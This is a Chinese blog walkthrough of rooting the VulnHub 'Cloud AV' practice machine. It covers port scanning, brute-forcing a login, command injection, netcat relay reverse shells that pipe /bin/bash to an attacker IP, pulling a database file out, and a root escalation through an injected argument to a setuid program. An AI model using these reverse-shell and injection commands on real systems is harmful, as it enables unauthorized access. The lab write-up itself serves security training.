Cloud AV靶机渗透过程

已于 2022-04-05 15:49:13 修改
阅读量2.5k 收藏
点赞数 33
分类专栏: 渗透 文章标签: 安全
于 2022-03-26 17:01:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36025144/article/details/123756720
版权

靶机地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/

背景:云防病毒扫描服务

目标:渗透该服务,找到漏洞并提权

难易程度:简单(思路和技巧)

攻击方法:端口扫描 web侦察 SQL注入 命令注入 密码爆破 代码分析 NC串联 本地提权

 0x01

主机发现:sudo arp-scan -l  倾向于黑客工具

arping  更多系统适用 使用for循环--for i in $(seq 1 254); do sudo arping -c 1 2.2.2.$i;done

0x02

使用nmap全端口扫描:sudo nmap -p- 目标ip

sudo nmap -p22,8080 -sV 目标ip

 watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA55qu55qu6bKBeHg=,size_20,color_FFFFFF,t_70,g_se,x_16

0x03

浏览器访问8080端口

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA55qu55qu6bKBeHg=,size_20,color_FFFFFF,t_70,g_se,x_16

burpsuit抓包

使用暴力破解

得知密码password

 watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA55qu55qu6bKBeHg=,size_20,color_FFFFFF,t_70,g_se,x_16

测试是否存在命令注入

 watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA55qu55qu6bKBeHg=,size_15,color_FFFFFF,t_70,g_se,x_16

0x04

 使用nc建立连接

hello | nc 10.0.2.4 3333 | /bin/bash | nc 10.0.2.4 4444
nc -nvlp 3333 #监听3333端口
nc -nvlp 4444 #监听4444端口

在3333监听端口界面输入命令在4444端口界面显示

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA55qu55qu6bKBeHg=,size_20,color_FFFFFF,t_70,g_se,x_16

查看database.sql文件---file database.sql

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA55qu55qu6bKBeHg=,size_20,color_FFFFFF,t_70,g_se,x_16

 使用nc将database.sql传到kali本机

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA55qu55qu6bKBeHg=,size_20,color_FFFFFF,t_70,g_se,x_16

0x05

 使用sqlite

.open db.sql  #打开文件
.database #查看加载的数据库命令
.dump   #显示数据库文件中的数据

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA55qu55qu6bKBeHg=,size_19,color_FFFFFF,t_70,g_se,x_16

 筛选/etc/passwd下可以通过ssh登录系统的账号

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA55qu55qu6bKBeHg=,size_20,color_FFFFFF,t_70,g_se,x_16

 导出进行hydra -L user.txt -P pass.txt ssh://2.2.2.2进行密码破解

破解失败

 0x06

 通过其他信息收集尝试提权

pwd   #查看你自己所在路径
cd..   #去到上一级目录收集信息
ls -l  #查看当前目录下内容

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA55qu55qu6bKBeHg=,size_18,color_FFFFFF,t_70,g_se,x_16

cat update_cloudav.c   #查看源代码

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA55qu55qu6bKBeHg=,size_20,color_FFFFFF,t_70,g_se,x_16

 要求我们提供一个命令行参数,参数正确会正常运行

 当我们执行命令的时候 后面要跟上一个参数

 0x07

构造payload

./update_cloudav "a | nc 10.0.2.4 5555 | /bin/bash | nc 10.0.2.4 6666"

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA55qu55qu6bKBeHg=,size_20,color_FFFFFF,t_70,g_se,x_16

成功获得root权限

 

 

皮皮鲁xx
关注
  • 33
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机渗透练习89-IA:Nemesis (1.0.1)
hirak0的博客
05-01 3368
靶机描述 靶机地址:https://www.vulnhub.com/entry/ia-nemesis-101,582/ Description Difficulty: Intermediate to Hard Goal: Get the root shell and read all the 3 flags. Information: You need some good encryption and programming skills to root this box. Please solve t
靶机练习】Vulnhub靶场Earth-练习记录
weixin_36591264的博客
02-17 2298
注:靶机开机前需要在虚拟机设置关闭USB,否则靶机无法打开 信息收集 攻击机IP:192.168.43.118 主机发现: sudo nmap -sP 192.168.43.1/24 确认目标机IP:192.168.43.241 端口扫描: sudo nmap -sC -sV -p- 192.168.43.241 扫描结果: 目标机开了22端口和80端口,80端口中配置了两个DNS,需要修改hosts文件指定IP。 没修改hosts之前访问http://192.168.43.241时返回Bad Req
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-12 1835
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
VulnHub | Red:1
薛定的餓貓
12-19 2908
Red : 1 目录Red : 1项目地址测试环境测试过程信息收集查找后门文件后门利用hash碰撞会话维持权限提出 项目地址 http://www.vulnhub.com/entry/red-1,753/ 难度:Medium 测试环境 攻击机:Kali 192.168.56.109 目标靶机:Ubuntu 192.168.56.113 测试过程 信息收集 查找靶机IParp-scan -I eth1 -l,获取到目标IP为192.168.56.113。 使用nmap扫描目标开放了哪些端口nmap -sS
VulnHub——CH4INRULZ
江左盟的博客
04-13 1118
简介 这是VulnHub中非常简单的一个靶机,通过本地文件包含漏洞结合上传绕过漏洞获得Web服务权限,最后通过内核漏洞提升权限获得root权限。 信息收集 使用fping 192.168.204.0/24 -agq探测局域网内其他主机,发现存在一个132主机,如图: 然后使用nmap 192.168.204.132 --max-rate 1000 -A扫描常用端口及服务,发现开启21,...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
vulnhub之sherlock
鲨鱼辣椒的博客
08-12 1226
靶机下载地址:https://www.vulnhub.com/entry/ha-sherlock,580/ 信息搜集 扫描网段获取真实IP地址 扫描IP地址获取服务以及开放端口信息 可以看到有好几个服务都是与邮件有关的一些协议,那么相信重头戏就是与邮件相关了 浏览器查看网站 在浏览整个网页之后,我想我大概明白我们要干什么了,应该是帮助夏洛克先生找到这次案件的真实凶手(神探夏洛克巨好看),案件大概就是有一位先生在他的公寓中遇害了,我们需要做的就是根据这位先生在他的电脑中留下来的线索找到凶.
vulnhub之vikings
weixin_54431413的博客
05-22 871
渗透常规操作,主机发现,端口扫描,服务版本发现,web页面信息收集-看看源代码中有没有有用的注释,api接口,隐藏的路径,之后涉及到暴力破解,对隐写内容的查看,角古猜想,最后提权方面,利用了一个程序的api接口,将ragnar加入到了sudo组里,从而通过sudo -s来提权。
vulnhub chronos
weixin_46107179的博客
04-06 4384
靶机下载地址 主机发现 二层扫描:arp-scan -l 或则 netdiscover -r 10.0.2.0/24,扫描得到主机的IP地址10.0.2.6 信息搜集 通过nmap信息搜集主机信息,得到主机开放了22,80,8000端口,并且用的web服务是通过node.js的Express framework写的,以及中间件是Apache等信息 然后用浏览器打开这两个端口,发现这两个页面其实是一个页面,知识80端口那个页面是8000端口加了css样式的,然后尝试扫描隐藏目录,并没有什么发现;但是在查
vulnhub-Tre-Tre1-wp
yutianovo的博客
09-01 396
靶机描述 Machine Name: Tre Author: SunCSR Team Difficulty: Intermediate Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox) DHCP: Enabled Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).
靶场练习第六天~vulnhub靶场之Lampiao
qq_57976347的博客
01-31 846
一、信息收集 1.靶机发现 (1)靶机lampiao与kali均为NAT模式 ,Kali的 IP为192.168.101.10, 扫描网段用命令nmap -sp192.168.101.0/24,发现靶机ip为192.168.101.107 2.靶机具体信息 (1)使用命令nmap -A (进行综合扫描) 192.168.101.107 -p 0-65535 (看看靶机开放了什么端口)正在上传…重新上传取消 3.发现1898端口开放http协议, (1)查看该网站,发现是一个博客网站 (
【甄选靶场】Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
最新发布
xnxqwzy的博客
07-29 3153
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
VulnHub-MOMENTUM: 1靶机
NeverForgetCX的博客
03-03 4583
前言: 在VulnHub官网上下载好MOMENTUM: 1靶机,并直接用VM导入打开。 攻击机kali:192.168.2.87 靶机IP:192.168.2.92 信息收集: 扫描靶机ip; arp-scan -l 得到靶机ip; 扫描靶机开放的端口;看见开放了22,80端口。 访问80端口http://192.168.2.92,得到一个有四张图片的网站,话不多说...
Vulnhub-Zico2靶机实战
御七彩虹猫
03-24 3188
Vulnhub-Zico2靶机实战
vulnhub靶机 trollcave-v1-2
qq_52178795的博客
06-16 155
重点:cve-2017-16995 提权
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

皮皮鲁xx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值